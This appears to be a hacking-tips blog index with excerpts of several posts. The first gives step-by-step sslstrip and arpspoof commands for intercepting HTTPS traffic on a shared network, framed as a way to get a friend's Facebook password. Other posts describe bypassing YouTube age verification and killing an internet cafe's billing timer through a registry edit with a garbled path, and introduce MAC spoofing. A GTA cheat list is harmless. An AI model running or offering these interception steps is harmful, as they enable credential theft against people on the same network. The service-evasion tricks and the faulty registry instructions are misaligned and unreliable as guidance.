Posts

SSL Strip on gmail

Image
What is SSL Strip? SSL strip is a software that is used to sniff the data over HTTP and HTTP S. The sniffer read all the data in a network with is send between a user and the Router but no a days SSH or "HTTPS" have made it very difficult to get useful data (Like Facebook Password of your friend in same wifi network). So here is a tools that can even intercept the data over HTTP and HTTPS. Running sslstrip Flip your machine into forwarding mode. (echo "1" > /proc/sys/net/ipv4/ip_forward) Setup iptables to redirect HTTP traffic to sslstrip. (iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>) Run sslstrip. (sslstrip.py -l <listenPort>) Run arpspoof to convince a network they should send their traffic to you. (arpspoof -i <interface> -t <targetIP> <gatewayIP>) That should do it. How do this work? First, arpspoof convinces a host that our MAC address is the router’s MAC addres

Bypass youtube 18+ age verification without login

Image
Sometime YouTube ask you to sign in for your age verification to watch 18+ videos. So i will make new simple YouTube trick   to watch adult or 18+ YouTube videos without signing In. 1. First get the  Url  of video you want to watch. As shown below.           http://www.youtube.com/watch?v= 79wNhCbsH1Y   2. Then  cop y the Video Id. For above link video Id is   79wNhCbsH1Y 3. Now paste the Video Id in the link given below.        http://www.youtube.com/v/ VideoId ?fs=1 4.  Replace  VideoId   with the Id you copied in   Step 2 5. Now the url will become as shown below.         http://www.youtube.com/v/ 79wNhCbsH1Y ?fs=1 copy it and past this url to show youtube video without sign in   copy it and past this url to show youtube video without sign in   Enjoy it

Now we are stop cybercafe time limits

Image
you can now stop worring about spending so much bucks for your web browsing at any internet cafe. This trick will enable you to hack and dissable your cafe timer 1. From your desktop, Go to  Start->Run 2. Then type '' regedit '' without the quotes and hit Enter! the registry window should open. 3. Now navigate to; HKEY_CURRENT_USER>AppEvents>Software>Classes>Microsoft>Windows> Current Version>Internet Settings>Policies>System 5. Then on the right pane where it says  Disable Task manager , right click on it and scroll down to  modify , then change the value of it to  0 . 6. Now open the Task manager by pressing the keys ''CTRL+SHIFT+ESC'' ... then under the Application tab, dissable  Internet Cafe's timer.  (Simply right click on it and End Task)

GTA Vice City chets

Vehicle Vice City Cheats bigbang - Destroy all cars wheelsareallineed - Strip cars comeflywithme - Flying dodo car greenlight - All traffic lights are green miamitraffic - Traffic moves faster travelinstyle - Flying car panzer - Spawn a tank thelastride - Spawn a hearse rockandrollcar - Spawn a limo rubbishcar - Spawn a garbage truck gettherefast - Spawn a sabre turbo betterthanwalking - Spwan a caddy gettherequickly - Fast car getthereveryfastindeed - Faster car getthereamazinglyfast - Fastest car iwantitpaintedblack - Black traffic seaways - Cars float on water gripiseverything - Improved car handling ahairdresserscar - Pink cars loadsoflittlethings - Change wheel size General Game Play/Character Vice City Cheats apleasantday - Nice weather alovelyday - Great weather abitdrieg - Cloudy weather catsanddogs - Rain cantseeathing - Fog lifeispassingmeby - Speed up game stilllikedressingup - Change pedestrian clothes fightfightfight - Pedestrian riot nobodylikesme - Pedestrians attack y

MAC Address Spoofing

Image
MAC Address Media Access Control (MAC) address is a unique identifier or a serial number assigned to a network interface. This unique identifier is used in the Media Access Control protocol. It is hard coded in the read only memory of your NIC (network interface card). MAC addresses are used for routing packets between physical devices (i.e. network interface cards) on networks. Most important thing is that no two NIC card in the world can have same MAC address. MAC Spoofing MAC Spoofing is the way of changing the MAC address of a NIC on a network. By using MAC Spoofing, you will never by pass server access control list. It is only used to hide your identity on the network and it allows network devices to impersonate another network device. In IP Spoofing, response came to the original MAC Address Spoofing With SMAC SMAC is a nice tool that can help you in spoofing MAC address of your NIC. This tool is available for Windows and works on Windows VISTA, XP, 2003, and 2000 sy